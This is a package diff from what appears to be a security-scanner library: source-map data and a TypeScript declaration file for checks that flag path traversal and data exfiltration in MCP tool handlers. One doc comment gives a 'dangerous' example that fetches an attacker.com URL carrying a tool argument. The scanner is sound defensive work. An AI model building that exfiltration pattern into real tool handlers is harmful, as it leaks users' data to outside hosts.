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"}

package/dist/src/lib/analyzers/javascript/security-checks/mcp-security-path-checks.d.ts

@@ -0,0 +1,53 @@
+/**
+ * MCP Path & Exfiltration Security Checks — JavaScript/TypeScript
+ *
+ * Contains path traversal and data exfiltration checks for MCP tool handlers:
+ *   MCP-JS-003 — Path traversal via path.join/resolve without boundary check
+ *   MCP-JS-004 — Data exfiltration via outbound HTTP with tool arg in URL
+ *
+ * Both checks use brace-depth tracking scoped to tool handler callbacks,
+ * preventing false positives on path/HTTP calls outside handlers.
+ *
+ * @module mcp-security-path-checks
+ */
+import { SecurityVulnerability } from '../../types';
+import { CreateVulnerabilityFn } from './mcp-security';
+/**
+ * MCP-JS-003: Path traversal in tool handler without boundary check
+ * Severity: HIGH (CVSS 7.5) | CWE-22
+ *
+ * Detects tool handlers that build filesystem paths using path.join/resolve
+ * with a tool argument, but do NOT perform a startsWith() boundary check in
+ * the same handler to confine access to an allowed directory.
+ *
+ * Algorithm:
+ * 1. Track entry/exit of each server.tool() callback via brace depth.
+ * 2. Inside the handler, record lines where path.join/resolve AND a tool arg
+ *    access appear together.
+ * 3. Also watch for .startsWith() — this is the safe-pattern signal.
+ * 4. On handler exit: if path join lines were found AND no boundary check was
+ *    seen, emit MCP-JS-003 for each flagged line.
+ *
+ * Safe pattern: path.resolve(BASE, args.x) + resolved.startsWith(BASE) → no finding.
+ */
+export declare function checkPathTraversal(code: string, createVulnerability: CreateVulnerabilityFn): SecurityVulnerability[];
+/**
+ * MCP-JS-004: Data exfiltration via outbound HTTP in tool handler
+ * Severity: HIGH (CVSS 7.5) | CWE-200
+ *
+ * Detects tool handlers that make outbound HTTP requests (fetch, axios,
+ * https.request, got, request) where the URL is a template literal containing
+ * a tool argument interpolation. Static URLs without arg interpolation are safe
+ * and are not flagged.
+ *
+ * Algorithm:
+ * 1. Track entry/exit of each server.tool() callback via brace depth.
+ * 2. Inside the handler, check each line for an HTTP client call AND a
+ *    template literal URL that interpolates a tool arg.
+ * 3. Emit MCP-JS-004 for each matching line.
+ *
+ * Safe pattern: fetch('https://static.api/endpoint') → no finding.
+ * Dangerous:    fetch(`https://attacker.com?q=${args.query}`) → finding.
+ */
+export declare function checkDataExfiltration(code: string, createVulnerability: CreateVulnerabilityFn): SecurityVulnerability[];
+//# sourceMappingURL=mcp-security-path-checks.d.ts.map

package/dist/src/lib/analyzers/javascript/security-checks/mcp-security-path-checks.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"mcp-security-path-checks.d.ts","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/javascript/security-checks/mcp-security-path-checks.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;GAWG;AAEH,OAAO,EAAE,qBAAqB,EAAE,MAAM,aAAa,CAAC;AACpD,OAAO,EAAE,qBAAqB,EAAE,MAAM,gBAAgB,CAAC;AAkCvD;;;;;;;;;;;;;;;;;GAiBG;AACH,wBAAgB,kBAAkB,CAChC,IAAI,EAAE,MAAM,EACZ,mBAAmB,EAAE,qBAAqB,GACzC,qBAAqB,EAAE,CAsFzB;AAID;;;;;;;;;;;;;;;;;GAiBG;AACH,wBAAgB,qBAAqB,CACnC,IAAI,EAAE,MAAM,EACZ,mBAAmB,EAAE,qBAAqB,GACzC,qBAAqB,EAAE,CAgEzB"}